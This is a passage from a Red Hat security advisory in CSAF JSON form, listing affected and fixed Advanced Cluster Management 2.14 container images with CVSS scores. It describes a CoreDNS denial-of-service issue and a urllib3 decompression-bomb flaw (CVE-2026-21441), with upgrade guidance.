"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/coredns/coredns/core/dnsserver: CoreDNS DoS via unbounded connections and oversized messages"
},
{
"cve": "CVE-2026-21441",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-01-07T23:01:59.422078+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2427726"
}
],
"notes": [
{
"category": "description",
"text": "urllib3 is an HTTP client library for Python. urllib3\u0027s streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-21441"
},
{
"category": "external",
"summary": "RHBZ#2427726",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427726"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-21441",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21441"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b",
"url": "https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"
}
],
"release_date": "2026-01-07T22:09:01.936000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
